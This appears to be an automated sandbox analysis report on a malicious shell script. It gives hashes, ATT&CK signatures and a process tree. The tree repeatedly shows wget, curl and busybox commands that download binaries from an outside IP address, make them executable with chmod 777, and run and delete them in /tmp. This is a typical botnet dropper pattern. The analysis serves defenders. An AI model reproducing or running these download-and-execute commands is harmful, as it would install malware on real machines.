Analysis
-
max time kernel
38s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
25/10/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
-
Size
10KB
-
MD5
28e68f4a8e17f58eb03239953a34f7e6
-
SHA1
ab686c91da287340dad814683646a6b42978b168
-
SHA256
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f
-
SHA512
ad6c64228000359844d7cbf7134a85387cef19f1f8d10ee5fb2c649958583cabe83458cc1a0785876804db6f37239ce2a7548eca8ad5c6aca61903a7de19b09f
-
SSDEEP
192:W0H2erUorJWr9dhjRxANRbqck7YcxQE/gYXYMpAAd5MUbYsyck7YcvQE/gYRYMp9:W0H2erUorEr9dkQYMpAAd5MUbYsMYMp9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 20 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh1⤵PID:1499
-
/bin/rm/bin/rm bins.sh2⤵PID:1500
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1501
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1505
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1506
-
-
/bin/chmodchmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1508
-
-
/bin/rmrm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1509
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1512
-
-
/bin/chmodchmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1518
-
-
/bin/chmodchmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1524
-
-
/bin/chmodchmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1530
-
-
/bin/chmodchmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1536
-
-
/bin/chmodchmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1542
-
-
/bin/chmodchmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1548
-
-
/bin/chmodchmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1554
-
-
/bin/chmodchmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1560
-
-
/bin/chmodchmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1566
-
-
/bin/chmodchmod 777 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG./fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1568
-
-
/bin/rmrm fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1569
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1572
-
-
/bin/chmodchmod 777 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe./Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1578
-
-
/bin/chmodchmod 777 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8./DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1584
-
-
/bin/chmodchmod 777 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP./eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1590
-
-
/bin/chmodchmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1596
-
-
/bin/chmodchmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1602
-
-
/bin/chmodchmod 777 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG./fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1604
-
-
/bin/rmrm fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1605
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1608
-
-
/bin/chmodchmod 777 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe./Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1614
-
-
/bin/chmodchmod 777 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8./DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1620
-
-
/bin/chmodchmod 777 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP./eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1626
-
-
/bin/chmodchmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Executes dropped EXE
PID:1628
-
-
/bin/rmrm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1632
-
-
/bin/chmodchmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Executes dropped EXE
PID:1636
-
-
/bin/rmrm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1637
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1638
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1640
-
-
/bin/chmodchmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- File and Directory Permissions Modification
PID:1641
-
-
/tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1643
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1646
-
-
/bin/chmodchmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Executes dropped EXE
PID:1648
-
-
/bin/rmrm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1649
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1650
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1651
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1652
-
-
/bin/chmodchmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1654
-
-
/bin/rmrm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1655
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Writes file to tmp directory
PID:1657
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1658
-
-
/bin/chmodchmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- File and Directory Permissions Modification
PID:1659
-
-
/tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Executes dropped EXE
PID:1660
-
-
/bin/rmrm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1661
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1662
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Writes file to tmp directory
PID:1663
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1664
-
-
/bin/chmodchmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- File and Directory Permissions Modification
PID:1665
-
-
/tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Executes dropped EXE
PID:1666
-
-
/bin/rmrm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1667
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1668
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Writes file to tmp directory
PID:1669
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1670
-
-
/bin/chmodchmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- File and Directory Permissions Modification
PID:1671
-
-
/tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Executes dropped EXE
PID:1672
-
-
/bin/rmrm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1673
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97